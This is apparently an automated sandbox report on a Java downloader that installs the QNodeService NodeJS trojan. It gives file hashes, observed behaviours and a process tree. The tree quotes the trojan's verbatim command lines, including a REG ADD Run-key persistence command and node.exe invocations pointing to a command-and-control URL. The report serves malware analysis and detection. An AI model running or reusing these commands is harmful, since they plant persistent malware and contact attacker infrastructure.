Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
130s -
max time network
148s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
06/07/2020, 14:46
Static task
static1
Behavioral task
behavioral1
Sample
99dcdadfeed1b6271637cd158eddc785.jar
Resource
win7
Behavioral task
behavioral2
Sample
99dcdadfeed1b6271637cd158eddc785.jar
Resource
win10v200430
General
-
Target
99dcdadfeed1b6271637cd158eddc785.jar
-
Size
11KB
-
MD5
99dcdadfeed1b6271637cd158eddc785
-
SHA1
4420bd2bb41db133243192337ff37a1b9a34414a
-
SHA256
f0e9d3a5162ecadf7a48a64603e0d813ed45ff53882e63251e3f3c7c5a2e408b
-
SHA512
4ca54d207a9ee57d14edd00d195bd2264443e2242fc6dce31eac2a2f0a33ce3d88e208819ef53aac874df6d52edbd041dde532f4a6266379ca7d7ea275f0126f
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3612 node.exe 3612 node.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 wtfismyip.com 12 wtfismyip.com -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1620 wrote to memory of 4084 1620 java.exe 73 PID 1620 wrote to memory of 4084 1620 java.exe 73 PID 4084 wrote to memory of 2712 4084 node.exe 74 PID 4084 wrote to memory of 2712 4084 node.exe 74 PID 2712 wrote to memory of 2828 2712 cmd.exe 75 PID 2712 wrote to memory of 2828 2712 cmd.exe 75 PID 4084 wrote to memory of 3612 4084 node.exe 76 PID 4084 wrote to memory of 3612 4084 node.exe 76 -
Executes dropped EXE 2 IoCs
pid Process 4084 node.exe 3612 node.exe -
Loads dropped DLL 4 IoCs
pid Process 3612 node.exe 3612 node.exe 3612 node.exe 3612 node.exe -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfa0-118.dat family_qnodeservice -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-a553500b = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-a553500b.cmd\"" reg.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\99dcdadfeed1b6271637cd158eddc785.jar1⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://richiealvin2020.casacam.net2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4084 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-a553500b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-a553500b.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-a553500b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-a553500b.cmd\""4⤵
- Adds Run entry to start application
PID:2828
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://richiealvin2020.casacam.net3⤵
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Executes dropped EXE
- Loads dropped DLL
PID:3612
-
-